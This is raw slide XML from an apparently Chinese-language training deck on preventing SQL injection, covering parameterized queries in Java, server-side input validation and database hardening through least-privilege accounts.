              <a:tr h="2304256">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1400" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>String custname=request.getParameter("customerName");</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1400" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>//此处应该还有其他输入参数验证逻辑，被忽略</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1400" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1400" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>String query="SELECT account_balance FROM user_data</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1400" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1400" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>WHERE user_name=?";</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1400" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>//执行参数化查询</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1400" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>PreparedStatementpstmt=connection.prepareStatement(query);</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1400" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>pstmt.setString(1,custname);</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1400" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1400" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>ResultSetresults=pstmt.executeQuery();</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="14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17538" y="92075"/>
            <a:ext cx="6030912" cy="561975"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>注入：规避</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34819" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="249238" y="1025525"/>
            <a:ext cx="86868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pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>严格限定参数类型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>明确参数检验的边界，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>必须在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>服务端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>执行数据验证</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>采用参数化查询的方法（推荐）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>内置过滤系统（本质是黑名单，很常见但是不推荐）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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7538" y="92075"/>
            <a:ext cx="6030912" cy="561975"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>注入：安全编码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35843" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="3897313"/>
            <a:ext cx="5715000" cy="253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eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>安全编码不难，真正困难的是如何做到全面安全，这需要良好的程序设计以及编码习惯。支离破碎的设计与随意混杂的编码难以开发出安全的系统。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>各种语言与数据库的实际情况也有所区别，所以需要具体问题具体分析。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35844" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1447800"/>
            <a:ext cx="6019800" cy="2209800"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="folHlink"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
              <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="12700">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
              </a14:hiddenLine>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="266700"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chemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>输入验证</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>数字型的输入必须是合法的数字；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>字符型的输入中对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>进行特殊处理；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>验证所有的输入点，包括</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>以及其他</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>头；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>使用符合规范的数据库访问语句</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>正确使用静态查询语句，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PreparedStatement</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3584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638" y="1447800"/>
            <a:ext cx="17145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WSCv2a"/>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78638" y="3810000"/>
            <a:ext cx="1731962" cy="21907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505569" y="1196752"/>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785813" y="1196752"/>
            <a:ext cx="6624637" cy="2277547"/>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安全</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>开发概述</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="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中再应用检测项目漏洞统计</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重要及多发</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>漏洞成因与防范</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="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a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>  平台部署与维护具体</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>措施</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" b="1"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7538" y="92075"/>
            <a:ext cx="6030912" cy="561975"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>注入：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>数据库加固</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38915" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="444500" y="1477963"/>
            <a:ext cx="8305800" cy="4808537"/>
          </a:xfrm>
          <a:ln>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="355600" defTabSz="854710" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>除了在代码设计开发阶段预防</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>注入外，对数据库进行加固也能够把攻击者所能造成的损失控制在一定范围内；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-355600" defTabSz="854710" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-355600" defTabSz="854710" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>主要包括：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-355600" defTabSz="854710" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>最小权限原则，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>禁止将任何高权限帐户（例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>dba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>等等）用于应用程序数据库访问。更安全的方法是单独为应用创建有限访问帐户。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-355600" defTabSz="854710" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
